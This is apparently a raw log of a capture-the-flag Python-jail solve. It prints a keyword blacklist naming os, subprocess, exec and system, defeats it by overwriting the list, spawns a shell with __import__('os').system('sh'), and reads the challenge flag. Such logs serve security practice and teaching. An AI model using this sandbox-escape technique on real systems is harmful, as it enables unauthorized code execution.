>> print(dir())
['b4n1ist15it', 'data', 'j']
>> print(b4n1ist15it)
['\\', '\\x', '%', 'sys', 'os', 'subprocess', '+', 'glob', 'exec', 'input', 'global', 'local', '.', 'open', 'read', 'file', 'from', 'eval', '_', 'attr', 'system', 'modules', '[', ']']
>> b4n1ist15it=list()
>> __import__("os").system("sh")
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
ls /home
NC
overflow
Pyjail
Pyjail2
Pyjail3
python
rpg_game
sohard
sysrop
ls /home/Pyjail2
flag
pyjail2.py
cat /home/Pyjail2/flag
TRUST{dir_mag1c_N3w_meta_pyja1l_1s_g00d_0r_b4d...?_t3l1_m3}
